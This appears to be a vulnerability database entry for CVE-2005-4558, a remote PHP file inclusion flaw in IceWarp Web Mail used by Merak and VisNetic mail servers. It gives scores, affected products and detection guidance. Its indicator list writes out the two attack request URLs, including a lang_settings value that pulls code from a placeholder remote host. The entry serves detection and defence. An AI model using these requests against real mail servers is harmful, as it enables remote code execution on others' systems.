cbcvebase.
CVE-2005-4558
published 2005-12-28

CVE-2005-4558: IceWarp Web Mail 5.5.1, as used by Merak Mail Server 8.3.0r and VisNetic Mail Server version 8.3.0 build 1, does not properly restrict acceptable values for…

PriorityP268medium6.5CVSS 2.0
AVNACLAuSCPIPAP
ITWEXPLOITVulnCheck KEV
Exploited in the wild
EPSS
8.33%
94.2th percentile
IceWarp Web Mail 5.5.1, as used by Merak Mail Server 8.3.0r and VisNetic Mail Server version 8.3.0 build 1, does not properly restrict acceptable values for the language parameter to mail/settings.html before it is stored in a database, which can allow remote authenticated users to include arbitrary PHP code via a URL in a modified lang_settings parameter to mail/index.html.

Affected

6 ranges
VendorProductVersion rangeFixed in
deerfieldvisnetic_mail_server
deerfieldvisnetic_mail_server
icewarpweb_mail
icewarpweb_mail
merakmail_server
merakmail_server

Detection & IOCsextracted from sources · hover to see the quote

urlhttp://example.com:32000/mail/settings.html?id=[current_id]&Save_x=1&language=TEST
urlhttp://example.com:32000/mail/index.html?id=[current_id]&lang_settings[TEST]=test;http://[host]/;
path/mail/settings.html
path/mail/index.html
port32000
  • Monitor HTTP requests to /mail/settings.html containing a manipulated 'language' parameter with non-standard values (e.g., URLs or path traversal strings) — indicative of LFI exploitation attempt.
  • Monitor HTTP requests to /mail/index.html containing a 'lang_settings' parameter with array-style injection and semicolon-delimited remote URLs — indicative of RFI exploitation attempt.
  • Alert on lang_settings parameter values containing semicolons and external URLs (e.g., lang_settings[TEST]=test;http://[host]/;) in web server logs targeting IceWarp/Merak/VisNetic mail installations.
  • This vulnerability was confirmed actively exploited in the wild as of July 2007; prioritize detection on any IceWarp WebMail 5.5.1, Merak 8.3.0r, or VisNetic 8.3.0 build 1 deployments.
  • ·The vulnerability requires the attacker to be authenticated; unauthenticated exploitation is not directly described for the lang_settings/language parameter vectors.
  • ·The malicious language value is stored in a database before being executed, meaning the injection may persist and trigger on subsequent requests rather than immediately — detection must account for stored/second-order execution.

CVSS provenance

nvdv2.06.5MEDIUMAV:N/AC:L/Au:S/C:P/I:P/A:P
vulncheck6.5MEDIUM
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.